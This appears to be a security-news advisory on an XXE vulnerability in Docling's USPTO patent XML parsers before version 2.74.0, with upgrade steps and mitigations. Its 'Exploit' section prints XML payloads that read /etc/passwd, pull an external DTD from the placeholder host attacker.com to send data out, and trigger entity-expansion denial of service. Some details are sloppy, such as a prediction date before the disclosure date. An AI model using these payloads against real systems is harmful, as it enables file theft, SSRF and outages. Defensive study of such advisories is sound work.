Listen to this Post
The United States Patent and Trademark Office (USPTO) patent XML parser within Docling prior to version 2.74.0 was vulnerable to XML External Entity (XXE) injection due to an insecure default configuration. The parsing mechanism relied on the standard `xml.sax.parseString()` function, which processes XML documents without disabling the resolution of external entities. An attacker who can supply a malicious USPTO patent XML file to the parser can leverage this weakness to force the application to resolve arbitrary external entities defined in the XML’s Document Type Definition (DTD). This is possible because the parser’s default settings allow both external general entities and external parameter entities to be fetched and expanded during document processing.
Exploitation begins when the attacker crafts an XML payload containing a DTD that declares an external entity pointing to a sensitive resource, such as a local file on the server’s filesystem or an internal network endpoint. When the unsuspecting Docling component parses this XML, it interprets the entity declaration and instructs the underlying XML processor to retrieve the resource. The content of the resource is then embedded into the XML document and returned to the attacker, leading to arbitrary file disclosure. In cases where the attacker defines an entity referencing an internal service (e.g., http://169.254.169.254/latest/meta-data/`), the server unwittingly makes an HTTP request to that address, resulting in Server-Side Request Forgery (SSRF). Furthermore, by using nested or recursive entity expansions, the same weakness can be abused to exhaust system memory and CPU, launching a denial-of-service (Billion Laughs) attack.
The vulnerable code paths exist in three USPTO patent format parsers: ICE (v4.x), Grant v2.5, and Application v1.x, all of which share the same insecure `xml.sax.parseString()` implementation. The flaw was addressed in version 2.74.0 by replacing the stock SAX parser with a hardened equivalent from the `defusedxml` library, which enforces secure settings that block external entity resolution while still accommodating the DTD declarations required for valid USPTO patent files.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: Docling parser
Version: <2.74.0
Vulnerability : XXE injection
Severity: High (7.5)
date: 2026-06-03
<h2 style="color: blue;">Prediction: 2026-06-02</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Vulnerable component: docling[bash] < 2.74.0 Attack vector: Malicious USPTO XML Exploit prerequisites: Ability to submit XML CVSS base: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) Potential impact: Arbitrary file read Primary risk: SSRF, DoS, data leak
Check installed version
pip show docling | grep Version
Upgrade to patched version
pip install --upgrade docling>=2.74.0
Verify secure configuration
python -c "from defusedxml.sax import make_parser; parser = make_parser(); print(parser.getFeature('http://xml.org/sax/features/external-general-entities'))"
<h2 style="color: blue;">Exploit:</h2>
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE patent [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]> <patent_document> <application>&xxe;</application> </patent_document>
<?xml version="1.0"?> <!DOCTYPE patent [ <!ENTITY % payload SYSTEM "http://attacker.com/xxe.dtd"> %payload; ]> <patent_document>&send;</patent_document>
<?xml version="1.0"?> <!DOCTYPE patent [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;"> ]> <patent_document>&lol3;</patent_document>
<h2 style="color: blue;">Protection:</h2>
- Upgrade to Docling version 2.74.0 or later.
- Apply `defusedxml` as a secure XML parser.
- Reject external entities in SAX parser configurations.
- Validate and sanitize all incoming USPTO XML files.
- Enforce strict memory and CPU limits on parsing.
- Monitor for outbound HTTP requests from patent services.
<h2 style="color: blue;">Impact:</h2>
- Arbitrary File Read: Attackers can read sensitive files (e.g.,/etc/passwd`, configuration files, source code) from the server’s filesystem by defining local file system external entities.
– Server-Side Request Forgery (SSRF): An attacker can force the server to make arbitrary HTTP requests to internal systems, potentially exposing cloud metadata endpoints, internal APIs, or conducting port scans.
– Denial of Service (DoS): The “Billion Laughs” attack can be executed via deeply nested or recursive entity expansions, rapidly exhausting memory and CPU resources and causing the application to crash or become unresponsive.
– Widespread Exposure: The vulnerability is present in three separate USPTO patent format parsers (ICE v4.x, Grant v2.5, Application v1.x) within the same codebase, increasing the attack surface across multiple document processing pipelines.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

